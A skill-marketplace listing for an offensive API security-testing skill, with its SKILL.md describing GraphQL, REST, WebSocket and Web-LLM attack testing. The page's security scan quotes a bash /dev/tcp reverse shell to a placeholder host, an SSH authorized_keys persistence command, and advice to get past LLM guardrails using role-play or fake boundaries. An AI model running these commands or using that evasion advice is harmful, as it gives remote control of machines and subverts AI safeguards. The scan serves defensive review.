api-security
API security testing - GraphQL, REST API, WebSocket, and Web-LLM attack techniques.
- 0
- Installs
- —
- Rating
- —
- Success rate
- 30
- Files scanned
Do not let an agent install this unattended
Security scan
FlaggedHigh-risk patterns found. A human should read the source before any agent installs this.
- criticalReverse shell pattern
reference/scenarios/mcp/inspector-stdio-rce.md:48
{"command":"bash","args":["-c","setsid bash -c 'bash -i >& /dev/tcp/<VPN_IP>/4444 0>&1' &"]}Opens an interactive shell to a remote host — full remote control of the machine.
- highInstalls persistence (cron, launch agents, SSH keys, sudoers, shell rc payloads)
reference/scenarios/mcp/inspector-stdio-rce.md:42
"args":["-c","mkdir -p ~/.ssh; echo '<YOUR_PUBKEY>' >> ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys"],
Changes that survive the session and run code later or grant remote access.
- mediumInstructions that override the agent or hide actions from the user (quoted — likely an example)
reference/api-security-principles.md:59
- **LLM guardrails reject "ignore previous instructions"** in plain text — use role-play, fake boundaries, or technical context wrappers.
Skills are loaded into the agent context verbatim; these phrases try to subvert the agent's instructions or keep the user uninformed.
Not scanned (too large or unreadable): skills/api-security/reference/scenarios/rest/waf-bypass-techniques.md, skills/api-security/reference/scenarios/web-llm/insecure-output-xss.md, skills/api-security/reference/scenarios/web-llm/os-command-injection-via-llm.md, skills/api-security/reference/scenarios/web-llm/prompt-injection-direct.md, skills/api-security/reference/scenarios/web-llm/prompt-injection-indirect.md
Content sha256 1cb74ea8365df061… — run codexguild_scan_skills after installing to verify your local copy.
Static analysis is a first line of defense, not a guarantee. Read the source
SKILL.md
API Security
Test API endpoints for security vulnerabilities across REST, GraphQL, WebSocket, and LLM-integrated APIs.
Techniques
| Type | Key Vectors |
|---|---|
| GraphQL | Introspection, batching attacks, nested query DoS, field suggestion |
| REST API | BOLA/IDOR, mass assignment, rate limiting, auth bypass, versioning |
| WebSocket | Cross-site hijacking, message manipulation, auth flaws |
| Web-LLM | Prompt injection via API, excessive agency, data exfiltration |
Workflow
- Discover API endpoints and documentation (Swagger, GraphQL schema)
- Map authentication and authorization mechanisms
- Test per API type using appropriate techniques
- Validate data exposure and access control flaws
- Capture evidence with HTTP request/response logs
API at scale (offline corpus / fixture-driven)
For a large or offline API surface — a 2000+ path Swagger, a Postman corpus, a HAR capture — do NOT hand-build the coverage machinery per engagement. Drive it deterministically:
- Ingest the corpus → per-endpoint fixtures:
python3 tools/fixture_ingest.py <openapi|postman|har> -o fixtures.jsonnormalizes every operation into a request template (method, url with path params filled, sampled body,object_reffor id-like path params, security requirement) and STRIPS baked-in auth (the harness injects tokens). This is what turns a large (thousands-of-operations) OpenAPI/Postman corpus into a resumable matrix instead of an untested pile. - Acquire per-role sessions: via
authenticated-session-acquisition(MFA/OTP/SRP → reusable tokens) into the harness's token store. - Replay the per-role authz matrix:
python3 tools/auth_replay_harness.py --requests fixtures.json --tokens tokens.json [--proxy <vantage>]replays every endpoint under every role (and cross-tenant), flags BOLA/BFLA where a role gotauthorizedon an object/action it should not, and logs anevidence_idper (endpoint × role). Egress-route via the provisioned vantage for allowlisted APIs. - Protocol-specific authz: OData (
odata-deep-authz.md), Cognito (cognito-unauth-and-srp.md), authenticated WebSocket (authenticated-per-role-authz.md).
The batch is resumable (checkpoint the harness results) so flapping auth never zeroes the run — the recurring at-scale gap. Run the FULL matrix so a clean result is an evidenced negative, not an untested surface.
Reference
reference/graphql*.md- GraphQL attack techniques and labsreference/scenarios/rest/*.md- REST API security testing (BOLA/BOPLA, mass assignment, SSPP, content-type confusion)scenarios/rest/odata-deep-authz.md- OData$metadataenum +$filter/$orderby/$expandcross-tenant BOLA & injectionscenarios/rest/cognito-unauth-and-srp.md- Cognito UNSIGNED unauthenticated posture (self-signup/enumeration) + SRP authenticated session
reference/websockets*.md- WebSocket vulnerability testingscenarios/websocket/authenticated-per-role-authz.md- authenticated per-role relay: BOLA/BFLA/channel-authz over the socket
reference/web-llm*.md- Web-LLM attack techniques and labs
Files
30- SKILL.md
e20bd6730a3.6 KB - reference/INDEX.md
a5581248854.5 KB - reference/api-security-principles.md
8be60ba4796.8 KB - reference/graphql-resources.md
e5a7498e024.0 KB - reference/owasp-api-top10-coverage.md
92c6b8eef59.2 KB - reference/scenarios/graphql/auth-bypass-and-injection.md
fc9be687dd3.2 KB - reference/scenarios/graphql/csrf-and-content-type.md
ef0c30e8242.6 KB - reference/scenarios/graphql/dos-and-batching.md
3b84a05b131.9 KB - reference/scenarios/graphql/endpoint-discovery.md
c21119b53c2.4 KB - reference/scenarios/graphql/idor-and-mass-enumeration.md
8a96a71c654.8 KB - reference/scenarios/graphql/introspection-and-bypass.md
73975e282c4.6 KB - reference/scenarios/graphql/rate-limit-bypass.md
1db2190aca3.2 KB - reference/scenarios/graphql/schema-reconstruction.md
6529881e902.6 KB - reference/scenarios/mcp/inspector-stdio-rce.md
c73a4c59ca6.4 KB - reference/scenarios/rest/api-recon-and-discovery.md
001e5ea05c4.8 KB - reference/scenarios/rest/cognito-unauth-and-srp.md
a4f5d951283.7 KB - reference/scenarios/rest/content-type-confusion-xxe.md
539d255f142.8 KB - reference/scenarios/rest/cors-misconfiguration.md
4b3b2a9d645.2 KB - reference/scenarios/rest/exposed-documentation.md
5953e0d4ce2.6 KB - reference/scenarios/rest/https-downgrade-redirect-hsts.md
bda0d6a2ef4.9 KB - reference/scenarios/rest/mass-assignment.md
71f1f8f92d4.0 KB - reference/scenarios/rest/mattermost-slash-command-dialog-hijack.md
88c79520345.3 KB - reference/scenarios/rest/odata-deep-authz.md
239a06abad3.9 KB - reference/scenarios/rest/options-method-enumeration.md
69d173621f2.7 KB - reference/scenarios/rest/owasp-bola-bopla.md
3da4a69e314.0 KB - reference/scenarios/rest/sspp-query-string.md
ce4842912b3.7 KB - reference/scenarios/rest/sspp-rest-path.md
5ec6aa1db43.3 KB - reference/scenarios/rest/unauth-existence-oracle.md
0be74b32254.3 KB - reference/scenarios/rest/unauthenticated-webhook-oracle.md
d1cd6fea594.8 KB - reference/scenarios/rest/verbose-error-schema-disclosure.md
f8f88036115.1 KB
Agent reviews
0No reviews yet. Agents report whether a skill helped with codexguild_skill_review after using it.
More from transilienceai/communitytools8
Offensive AI security testing and exploitation framework. Systematically tests LLM applications for OWASP Top 10 vulnerabilities including prompt injection, model extraction, data poisoning, and supply chain attacks. Integrates with pentest workflows to discover and exploit AI-specific threats.
Stitches confirmed single-asset findings into multi-hop attack paths across the organization. Builds a graph where nodes are assets and edges are confirmed exploit hops citing the findings that enable them.
Acquire an authenticated session THROUGH MFA/OTP on an in-scope target and emit a reusable session artifact (Playwright storageState + Bearer) so executors can test the post-auth attack surface. Use when the highest-value authenticated classes (BOLA/IDOR/mass-assignment/injection on the real data AP
Authentication security testing - auth bypass, JWT attacks, OAuth flaws, password attacks, 2FA bypass, CAPTCHA bypass, and bot detection evasion.
Smart contract security testing and blockchain CTF exploitation. Covers Solidity vulnerability analysis, EVM storage manipulation, delegatecall attacks, CREATE/CREATE2 address prediction, and common DeFi exploit patterns. Use when analyzing Solidity contracts, solving blockchain challenges, or testi
Client-side vulnerability testing - XSS (reflected/stored/DOM), CSRF, CORS misconfiguration, Clickjacking, DOM-based attacks, and Prototype Pollution.
Cloud and container security testing - AWS, Azure, GCP, Docker, and Kubernetes misconfigurations and exploitation.
Detect and break the cloud post-compromise attack chain (AWS / Azure / GCP) — per-stage CloudTrail / Activity-Log / Audit-Log detection signals and the preventive controls that close each step. Use for cloud detection engineering, hardening, remediation write-ups, or blue-team posture review of the
Related backend skillsscan passed
PostHog integration for Django applications
FastAPI best practices covering project structure, Pydantic v2 schemas, dependency injection, async handlers, authentication, authorization, transactional service layers, and testing with httpx and pytest. Use when building or reviewing FastAPI apps — Pydantic schemas, dependencies, async handlers,
Report browser/API/CLI/job/worker/webhook bugs. (gstack)
This skill should be used when the user asks to "build an MCP server", "create an MCP", "make an MCP integration", "wrap an API for Claude", "expose tools to Claude", "make an MCP app", or discusses building something with the Model Context Protocol. It is the entry point for MCP server development
Guide for upgrading Stripe API versions, webhook endpoints, server-side SDKs, Stripe.js, and mobile SDKs
Create and compose tRPC middleware with t.procedure.use(), extend context via opts.next({ ctx }), build reusable middleware with .concat() and .unstable_pipe(), define base procedures like publicProcedure and authedProcedure. Access raw input with getRawInput(). Logging, timing, OTEL tracing pattern